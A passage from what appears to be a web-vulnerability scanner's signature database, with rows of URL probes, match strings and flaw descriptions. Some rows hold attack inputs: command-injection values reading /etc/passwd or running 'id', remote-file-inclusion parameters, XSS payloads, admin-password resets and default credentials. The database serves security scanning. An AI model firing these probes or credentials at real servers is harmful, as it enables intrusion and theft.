to change the Cart32 admin password.\",\"\",\"\"\n\"001093\",\"5088\",\"ab\",\"/accounts/getuserdesc.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Hosting Controller 2002 administration page is available. This should be protected.\",\"\",\"\"\n\"001094\",\"0\",\"b\",\"@CGIDIRScgi-lib.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CGI Library. If retrieved check to see if it is outdated, it may have vulns\",\"\",\"\"\n\"001095\",\"0\",\"b\",\"@CGIDIRSlog/nether-log.pl?checkit\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default Pass: nethernet-rules\",\"\",\"\"\n\"001096\",\"0\",\"b\",\"@CGIDIRSmini_logger.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default password: guest\",\"\",\"\"\n\"001097\",\"0\",\"b\",\"@CGIDIRSmt-static/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Movable Type weblog found. May contain security problems in CGIs, weak passwords, and more. Default login 'Melody' with password 'Nelson'.\",\"\",\"\"\n\"001098\",\"0\",\"b\",\"@CGIDIRSmt/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Movable Type weblog found. May contain security problems in CGIs, weak passwords, and more. Default login 'Melody' with password 'Nelson'.\",\"\",\"\"\n\"001099\",\"0\",\"b\",\"@CGIDIRSnimages.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Alpha versions of the Nimages package vulnerable to non-specific 'major' security bugs.\",\"\",\"\"\n\"001100\",\"0\",\"b\",\"@CGIDIRSrobadmin.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default password: roblog\",\"\",\"\"\n\"001101\",\"0\",\"b\",\"/Admin/\",\"GET\",\"CobaltServer\",\"\",\"\",\"\",\"\",\"The web server is the CobaltRaq administrator. If password protection is broken, attackers will have access to admin your server. Use tcpwrappers or shut this down for safety.\",\"\",\"\"\n\"001102\",\"0\",\"0b\",\"@CGIDIRSnetpad.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"netpad.cgi may be an indication of a malicious user on the system, as it allows web access to the file system. It may also have remote vulnerabilities itself. This should be removed or protected.\",\"\",\"\"\n\"001103\",\"0\",\"1b\",\"@CGIDIRStroops.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI may be a leftover from a hacked site; may be used to attempt to hack other sites.  It should be investigated further.\",\"\",\"\"\n\"001104\",\"0\",\"1b\",\"@CGIDIRSunlg1.1\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"web backdoor by ULG\",\"\",\"\"\n\"001105\",\"0\",\"1b\",\"@CGIDIRSunlg1.2\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"web backdoor by ULG\",\"\",\"\"\n\"001106\",\"0\",\"8b\",\"@CGIDIRSrwwwshell.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"THC reverse www shell\",\"\",\"\"\n\"001107\",\"0\",\"ab\",\"@CGIDIRSphoto/manage.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"My Photo Gallery management interface. May allow full access to photo galleries and more.\",\"\",\"\"\n\"001109\",\"14538\",\"c\",\"/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"Achievo can be made to include PHP files from another domain. Upgrade to a new version.\",\"\",\"\"\n\"001110\",\"35876\",\"9\",\"/agentadmin.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Immobilier agentadmin.php contains multiple SQL injection vulnerabilities.\",\"\",\"\"\n\"001111\",\"50530\",\"c\",\"/b2-include/b2edit.showposts.php?b2inc=@RFIURL&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"B2 (cafelog.com) are vulnerable to remote inclusion by redefining $b2inc to a remote PHP file. Upgrade to a version higher than b2.06pre2. This vulnerability could not be confirmed.\",\"\",\"\"\n\"001112\",\"7377\",\"c\",\"/catalog/includes/include_once.php?include_file=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"phpWebSite or osCommerce may allow inclusion of remote scripts.\",\"\",\"\"\n\"001113\",\"35388\",\"c\",\"/errors/needinit.php?GALLERY_BASEDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"Gallery 1.3.0 and below allow PHP files to be included from another domain. Upgrade to the latest version.\",\"\",\"\"\n\"001114\",\"0\",\"13\",\"/sqldump.sql\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Database SQL?\",\"\",\"\"\n\"001115\",\"0\",\"13\",\"/structure.sql\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Database SQL?\",\"\",\"\"\n\"001116\",\"0\",\"2\",\"/servlet/SessionManager\",\"GET\",\"200\",\"Error Occurred\",\"\",\"\",\"\",\"IBM WebSphere reconfigure servlet (user=servlet, password=manager). All default code should be removed from servers.\",\"\",\"\"\n\"001117\",\"0\",\"23\",\"/php.ini\",\"GET\",\"\\[PHP\\]\",\"\",\"\",\"\",\"\",\"This file should not be available through the web interface.\",\"\",\"\"\n\"001118\",\"0\",\"2a\",\"/SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator\",\"GET\",\"Event Log\",\"\",\"\",\"\",\"\",\"SiteScope service has no password set. Restrict by IP and set a password.\",\"\",\"\"\n\"001119\",\"0\",\"3\",\"/ip.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This may be User Online from http://www.elpar.net version 2.0, which has a remotely accessible log file.\",\"\",\"\"\n\"001120\",\"15301\",\"3\",\"/JUNK(6).cfm?mode=debug\",\"GET\",\"Execution Time\",\"\",\"\",\"\",\"\",\"ColdFusion debug information contains sensitive information and can be viewed by appending ?Mode=debug at the end of the request.\",\"\",\"\"\n\"001121\",\"0\",\"3\",\"/level/42/exec/show%20conf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Retrieved Cisco configuration file.\",\"\",\"\"\n\"001122\",\"0\",\"3\",\"/livehelp/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"LiveHelp may reveal system information.\",\"\",\"\"\n\"001123\",\"0\",\"3\",\"/LiveHelp/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"LiveHelp may reveal system information.\",\"\",\"\"\n\"001124\",\"59536\",\"3\",\"/logicworks.ini\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"web-erp 0.1.4 and earlier allow .ini files to be read remotely.\",\"\",\"\"\n\"001125\",\"0\",\"3\",\"/login.jsp\",\"GET\",\"replace\\(\\\"https:\\\\\\/\\\\\\/10\",\"\",\"\",\"\",\"\",\"HP Insight Manager reveals internal IP addresses in the HTML page.\",\"\",\"\"\n\"001126\",\"0\",\"3\",\"/logins.html\",\"GET\",\"Below are the usernames and passwords\",\"\",\"\",\"\",\"\",\"The Divine/OpenMarket Content Server lists the default user names and passwords set up with the server.\",\"\",\"\"\n\"001127\",\"0\",\"3\",\"/logs/str_err.log\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Bmedia error log, contains invalid login attempts which include the invalid usernames and passwords entered (could just be typos & be very close to the right entries).\",\"\",\"\"\n\"001128\",\"6465\",\"3\",\"/mall_log_files/order.log\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"EZMall2000 exposes order information, http://www.ezmall2000.com/, see http://www.mindsec.com/advisories/post2.txt for details.\",\"\",\"\"\n\"001129\",\"3233\",\"3\",\"/mambo/administrator/phpinfo.php\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"Mambo Site Server 4.0.11 phpinfo.php script reveals system information.\",\"\",\"\"\n\"001130\",\"3204\",\"3\",\"/megabook/files/20/setup.db\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Megabook guestbook configuration available remotely.\",\"\",\"\"\n\"001132\",\"0\",\"3\",\"/modules.php?name=Members_List&sql_debug=1\",\"GET\",\"SQL query: \",\"\",\"\",\"\",\"\",\"The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string.\",\"\",\"\"\n\"001133\",\"0\",\"3\",\"/myinvoicer/config.inc\",\"GET\",\"System settings\",\"\",\"\",\"\",\"\",\"MyInvoicer prior to 1.0.2 allowed remote user to read source of config file, possibly leaking sensitive information or passwords.\",\"\",\"\"\n\"001134\",\"6161\",\"3\",\"/officescan/hotdownload/ofscan.ini\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"OfficeScan from Trend Micro allows anyone to read the ofscan.ini file, which may contain passwords.\",\"\",\"\"\n\"001135\",\"0\",\"3\",\"/order/order_log_v12.dat\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt\",\"\",\"\"\n\"001136\",\"0\",\"3\",\"/order/order_log.dat\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt\",\"\",\"\"\n\"001137\",\"0\",\"3\",\"/orders/order_log_v12.dat\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt\",\"\",\"\"\n\"001138\",\"0\",\"3\",\"/Orders/order_log_v12.dat\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt\",\"\",\"\"\n\"001139\",\"0\",\"3\",\"/orders/order_log.dat\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt\",\"\",\"\"\n\"001140\",\"0\",\"3\",\"/Orders/order_log.dat\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt\",\"\",\"\"\n\"001141\",\"0\",\"3\",\"/PDG_Cart/shopper.conf\",\"GET\",\"Authnet_Login\",\"\",\"\",\"\",\"\",\"PDGSoft's PDG Shopping Cart 1.5 http://www.pdgsoft.com/ , Shopping cart software log, http://www.mindsec.com/advisories/post2.txt\",\"\",\"\"\n\"001142\",\"11140\",\"3\",\"/phorum/admin/stats.php\",\"GET\",\"Phorum Stats\",\"\",\"\",\"\",\"\",\"PHP based forum script Phorum allows a user to retrieve the top ten active users, including email addresses. Delete the script or pass protect it.\",\"\",\"\"\n\"001143\",\"2809\",\"3\",\"/php-coolfile/action.php?action=edit&file=config.php\",\"GET\",\"pass_1\",\"\",\"\",\"\",\"\",\"PHP-Coolfile 1.4 may allow any user to read the config.php file.\",\"\",\"\"\n\"001144\",\"3233\",\"3\",\"/phpBB/phpinfo.php\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"phpBBmod contains an enhanced version of the phpinfo.php script. This should be removed as it contains detailed system information.\",\"\",\"\"\n\"001147\",\"0\",\"3\",\"/pmlite.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"A Xoops CMS script was found. Version RC3 and below allows all users to view all messages (untested). See http://www.phpsecure.org/?zone=pComment&d=101 for details.\",\"\",\"\"\n\"001148\",\"0\",\"3\",\"/session/admnlogin\",\"GET\",\"200\",\"Error Occurred\",\"\",\"\",\"\",\"SessionServlet Output, has session cookie info.\",\"\",\"\"\n\"001149\",\"6560\",\"3\",\"/settings/site.ini\",\"GET\",\"DatabaseSettings\",\"\",\"\",\"\",\"\",\"eZ publish v3 and prior allow site setup code to be viewed remotely.\",\"\",\"\"\n\"001150\",\"613\",\"3\",\"/SiteScope/htdocs/SiteScope.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The SiteScope install may allow remote users to get sensitive information about the hosts being monitored.\",\"\",\"\"\n\"001151\",\"0\",\"3\",\"/soapdocs/ReleaseNotes.html\",\"GET\",\"Oracle SOAP\",\"\",\"\",\"\",\"\",\"Default Oracle SOAP documentation found.\",\"\",\"\"\n\"001152\",\"0\",\"3\",\"/ssdefs/siteseed.dtd\",\"GET\",\"imagesDir=\\\"\",\"\",\"\",\"\",\"\",\"Siteseed pre 1.4.2 has 'major' security problems, and this dtd file reveals the web root.\",\"\",\"\"\n\"001153\",\"0\",\"35\",\"/servlet/allaire.jrun.ssi.SSIFilter\",\"GET\",\"200\",\"Error Occurred\",\"\",\"\",\"\",\"Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call, see MPSB01-12 http://www.macromedia.com/devnet/security/security_zone/mpsb01-12.html.\",\"<!--#include virtual=\\\"/index.jsp\\\"-->\",\"\"\n\"001154\",\"2881\",\"3a\",\"/pp.php?action=login\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Pieterpost 0.10.6 allows anyone to access the 'virtual' account which can be used to relay/send e-mail.\",\"\",\"\"\n\"001155\",\"0\",\"6\",\"/isapi/count.pl?\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"AN HTTPd default script may allow writing over arbitrary files with a new content of '1', which could allow a trivial DoS. Append /../../../../../ctr.dll to replace this file's contents, for example.\",\"\",\"\"\n\"001156\",\"0\",\"7\",\"/krysalis/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Krysalis pre 1.0.3 may allow remote users to read arbitrary files outside docroot\",\"\",\"\"\n\"001157\",\"0\",\"8\",\"/logjam/showhits.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Logjam may possibly allow remote command execution via showhits.php page.\",\"\",\"\"\n\"001158\",\"0\",\"8\",\"/manual.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Does not filter input before passing to shell command. Try 'ls -l' as the man page entry.\",\"\",\"\"\n\"001159\",\"16748\",\"8\",\"/mods/apage/apage.cgi?f=file.htm.|id|\",\"GET\",\"uid=0\",\"\",\"\",\"\",\"\",\"WebAPP Apage.CGI remote command execution. BID-13637\",\"\",\"\"\n\"001160\",\"0\",\"8\",\"/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid\",\"GET\",\"uid=\",\"\",\"\",\"\",\"\",\"PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version.\",\"\",\"\"\n\"001161\",\"0\",\"8\",\"/nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid\",\"GET\",\"uid=\",\"\",\"\",\"\",\"\",\"PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version.\",\"\",\"\"\n\"001162\",\"0\",\"8\",\"/perl/-e%20%22system('cat%20/etc/passwd');\\%22\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"The installed Perl interpreter allows any command to be executed remotely.\",\"\",\"\"\n\"001163\",\"0\",\"8\",\"/phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid\",\"GET\",\"uid=\",\"\",\"\",\"\",\"\",\"PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version.\",\"\",\"\"\n\"001164\",\"0\",\"8\",\"/phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid\",\"GET\",\"uid=\",\"\",\"\",\"\",\"\",\"PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version.\",\"\",\"\"\n\"001165\",\"0\",\"8\",\"/Program%20Files/\",\"GET\",\"WindowsUpdate\",\"\",\"\",\"\",\"\",\"This check (B) uses the blue test (A) for possible exploit. see  http://www.badblue.com/down.htm.\",\"\",\"\"\n\"001166\",\"14329\",\"8\",\"/smssend.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"PhpSmssend may allow system calls if a ' is passed to it. http://zekiller.skytech.org/smssend.php\",\"\",\"\"\n\"001167\",\"0\",\"8a\",\"/pls/simpledad/admin_/dadentries.htm\",\"GET\",\"Add Database Access\",\"\",\"\",\"\",\"\",\"Oracle admin script allows modification of database information.\",\"\",\"\"\n\"001168\",\"0\",\"a\",\"/Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000\",\"POST\",\"Login as Admin successful\",\"\",\"\",\"\",\"\",\"Meridian Integrated Recorded Announcer default account admin/admin000 enabled\",\"\",\"\"\n\"001169\",\"113\",\"a\",\"/ncl_items.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This may allow attackers to reconfigure your Tektronix printer.\",\"\",\"\"\n\"001170\",\"551\",\"a\",\"/ncl_items.shtml?SUBJECT=1\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This may allow attackers to reconfigure your Tektronix printer.\",\"\",\"\"\n\"001171\",\"0\",\"a\",\"/photo/manage.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"My Photo Gallery management interface. May allow full access to photo galleries and more.\",\"\",\"\"\n\"001172\",\"0\",\"a\",\"/photodata/manage.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"My Photo Gallery management interface. May allow full access to photo galleries and more.\",\"\",\"\"\n\"001174\",\"5374\",\"a\",\"/pub/english.cgi?op=rmail\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"BSCW self-registration may be enabled. This could allow untrusted users semi-trusted access to the software. 3.x version (and probably some 4.x) allow arbitrary commands to be executed remotely.\",\"\",\"\"\n\"001175\",\"0\",\"a\",\"/pvote/ch_info.php?newpass=password&confirm=password%20\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"PVote administration page is available. Versions 1.5b and lower do not require authentication to reset the administration password.\",\"\",\"\"\n\"001176\",\"240\",\"a\",\"/scripts/wsisa.dll/WService=anything?WSMadmin\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Allows Webspeed to be remotely administered. Edit unbroker.properties and set AllowMsngrCmds to 0.\",\"\",\"\"\n\"001177\",\"3092\",\"a\",\"/SetSecurity.shm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Cisco System's My Access for Wireless. This resource should be password protected.\",\"\",\"\"\n\"001178\",\"3126\",\"a\",\"/submit?setoption=q&option=allowed_ips&value=255.255.255.255\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080.\",\"\",\"\"\n\"001179\",\"2225\",\"a\",\"/thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"paBox 1.6 may allow remote users to set the admin password. If successful, the 'admin' password is now 'admin'.\",\"\",\"\"\n\"001180\",\"817\",\"ab\",\"/servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&\",\"GET\",\"server\\.javawebserver\\.serviceAdmin\",\"\",\"\",\"\",\"\",\"The Sun JavaServer has the default admin/admin account enabled. Change the password or disable the server if it is not needed.\",\"\",\"\"\n\"001181\",\"3092\",\"b\",\"/shopadmin.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"VP-ASP shopping cart admin may be available via the web. Default ID/PW are vpasp/vpasp and admin/admin.\",\"\",\"\"\n\"001182\",\"3848\",\"c\",\"/modsecurity.php?inc_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"This phpWebSite script may allow inclusion of remote scripts by adding ?inc_prefix=http://YOURHOST/\",\"\",\"\"\n\"001183\",\"4268\",\"c\",\"/phpBB2/includes/db.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"Some versions of db.php from phpBB2 allow remote file inclusions. Verify the current version is running.\",\"\",\"\"\n\"001184\",\"6662\",\"4\",\"/<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"001185\",\"28260\",\"3\",\"/_vti_bin/shtml.exe/junk_nonexistant.exe\",\"GET\",\":\\\\\\\\\",\"\",\"\",\"Unknown CONTENT_TYPE\",\"\",\"This exe shows the full web path when a non-existent file is requested.\",\"\",\"\"\n\"001186\",\"3092\",\"1b\",\"/_vti_txt/_vti_cnf/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage directory found.\",\"\",\"\"\n\"001187\",\"3092\",\"1b\",\"/_vti_txt/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage directory found.\",\"\",\"\"\n\"001188\",\"3092\",\"23\",\"/_vti_pvt/deptodoc.btr\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage file found. This may contain useful information.\",\"\",\"\"\n\"001189\",\"3092\",\"23\",\"/_vti_pvt/doctodep.btr\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage file found. This may contain useful information.\",\"\",\"\"\n\"001190\",\"3092\",\"23\",\"/_vti_pvt/services.org\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage file found. This may contain useful information.\",\"\",\"\"\n\"001191\",\"28260\",\"3\",\"/_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611\",\"POST\",\"200\",\"\",\"\",\"FrontPage Error\",\"\",\"Gives info about server settings. CVE-2000-0413, CVE-2000-0709, CVE-2000-0710, BID-1608, BID-1174.\",\"\",\"X-Vermeer-Content-Type: application/x-www-form-urlencoded\"\n\"001192\",\"28260\",\"3\",\"/_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611\",\"POST\",\"200\",\"\",\"\",\"Unknown CONTENT_TYPE\",\"\",\"Gives info about server settings.\",\"\",\"X-Vermeer-Content-Type: application/x-www-form-urlencoded\"\n\"001193\",\"3092\",\"a\",\"/_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false\",\"POST\",\"200\",\"\",\"\",\"specified module could not be found\",\"\",\"We seem to have authoring access to the FrontPage web.\",\"\",\"X-Vermeer-Content-Type: application/x-www-form-urlencoded\"\n\"001194\",\"3092\",\"a\",\"/_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false\",\"POST\",\"200\",\"\",\"\",\"specified module could not be found\",\"\",\"We seem to have authoring access to the FrontPage web.\",\"\",\"X-Vermeer-Content-Type: application/x-www-form-urlencoded\"\n\"001195\",\"3092\",\"ad\",\"/_vti_bin/_vti_aut/dvwssr.dll\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This dll allows anyone with authoring privs to change other users file, and may contain a buffer overflow for unauthenticated users. See also : http://www.wiretrip.net/rfp/p/doc.asp?id=45&iface=1. MS00-025.\",\"\",\"\"\n\"001196\",\"3092\",\"d\",\"/_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\",\"GET\",\"The remote procedure call failed\",\"\",\"\",\"\",\"\",\"This dll is vulnerable to a remote overflow that can allow attackers to execute remote commands.\",\"\",\"\"\n\"001197\",\"3092\",\"d\",\"/_vti_bin/_vti_aut/fp30reg.dll\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Some versions of the FrontPage fp30reg.dll are vulnerable to a buffer overflow. See http://www.microsoft.com/technet/security/bulletin/ms03-051.asp for details.\",\"\",\"\"\n\"001198\",\"473\",\"23\",\"/_vti_pvt/access.cnf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Contains HTTP server-specific access control information. Remove or ACL if FrontPage is not being used.\",\"\",\"\"\n\"001199\",\"473\",\"23\",\"/_vti_pvt/botinfs.cnf\",\"GET\",\"vti_encoding\",\"\",\"\",\"\",\"\",\"FrontPage file found. This may contain useful information.\",\"\",\"\"\n\"001200\",\"473\",\"23\",\"/_vti_pvt/bots.cnf\",\"GET\",\"vti_encoding\",\"\",\"\",\"\",\"\",\"FrontPage file found. This may contain useful information.\",\"\",\"\"\n\"001201\",\"473\",\"23\",\"/_vti_pvt/service.cnf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Contains meta-information about the web server Remove or ACL if FrontPage is not being used.\",\"\",\"\"\n\"001202\",\"473\",\"23\",\"/_vti_pvt/services.cnf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Contains the list of subwebs. Remove or ACL if FrontPage is not being used. May reveal server version if Admin has changed it.\",\"\",\"\"\n\"001203\",\"473\",\"23\",\"/_vti_pvt/svacl.cnf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"File used to store whether subwebs have unique permissions settings and any IP address restrictions.  Can be used to discover information about subwebs, remove or ACL if FrontPage is not being used.\",\"\",\"\"\n\"001204\",\"473\",\"23\",\"/_vti_pvt/writeto.cnf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Contains information about form handler result files. Remove or ACL if FrontPage is not being used.\",\"\",\"\"\n\"001205\",\"473\",\"3\",\"/_vti_pvt/linkinfo.cnf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"IIS file shows http links on and off site. Might show host trust relationships and other machines on network.\",\"\",\"\"\n\"001206\",\"3233\",\"b\",\"@TOMCATADMIN\",\"GET\",\"Tomcat's administration web application\",\"\",\"\",\"\",\"\",\"Tomcat is installed, however the administration package does not appear to be.\",\"\",\"\"\n\"001207\",\"3092\",\"b\",\"/isx.html\",\"GET\",\"InfraStruXure Manager\",\"\",\"\",\"\",\"\",\"APC InfraStruXure Manager management page found. Content may reveal software version.\",\"\",\"\"\n\"001208\",\"5544\",\"7\",\"///\",\"GET\",\"Acme\\.Serve v1\\.7\",\"\",\"\",\"\",\"\",\"Acme.Serve allows arbitrary file retrieval\",\"\",\"\"\n\"001209\",\"3233\",\"3\",\"@CGIDIRSblog/mt-check.cgi\",\"GET\",\"Current working directory\",\"\",\"\",\"\",\"\",\"Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.\",\"\",\"\"\n\"001210\",\"9239\",\"4\",\"/mailman/admin/ml-name?\\\"><script>alert('Vulnerable')</script>;\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Mailman is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"001211\",\"16207\",\"4\",\"/mail/addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&addressemail=junk@example.com\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"IceWarp Webmail 3.3.3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"001212\",\"3233\",\"b\",\"/mailman/listinfo\",\"GET\",\"mailing list\",\"\",\"\",\"\",\"\",\"Mailman was found on the server.\",\"\",\"\"\n\"001213\",\"48\",\"3\",\"/doc/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The /doc/ directory is browsable. This may be /usr/doc.\",\"\",\"\"\n\"001214\",\"48\",\"3\",\"/doc\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The /doc directory is browsable. This may be /usr/doc.\",\"\",\"\"\n\"001215\",\"682\",\"4\",\"/webalizer/\",\"GET\",\"Generated by The Webalizer\",\"\",\"\",\"\",\"\",\"Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"001216\",\"682\",\"4\",\"/web/\",\"GET\",\"Generated by The Webalizer\",\"\",\"\",\"\",\"\",\"Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"001217\",\"682\",\"4\",\"/usage/\",\"GET\",\"Generated by (The )?Webalizer\",\"\",\"\",\"\",\"\",\"Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"001218\",\"3092\",\"3\",\"/sitemap.xml\",\"GET\",\"200\",\"\",\"<urlset\",\"\",\"\",\"This gives a nice listing of the site content.\",\"\",\"\"\n\"001220\",\"18265\",\"c\",\"/photo_album/apa_phpinclude.inc.php?apa_module_basedir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"Atomic Photo Album could allow remote source inclusion.\",\"\",\"\"\n\"001221\",\"250\",\"a\",\"/cgis/wwwboard/wwwboard.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Versions 2.0 Alpha and below have multiple problems. See BID-1795 which could allow over-write of messages. Default ID 'WebAdmin' with pass 'WebBoard'.\",\"\",\"\"\n\"001222\",\"250\",\"a\",\"/cgis/wwwboard/wwwboard.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Versions 2.0 Alpha and below have multiple problems. See BID-1795 which could allow over-write of 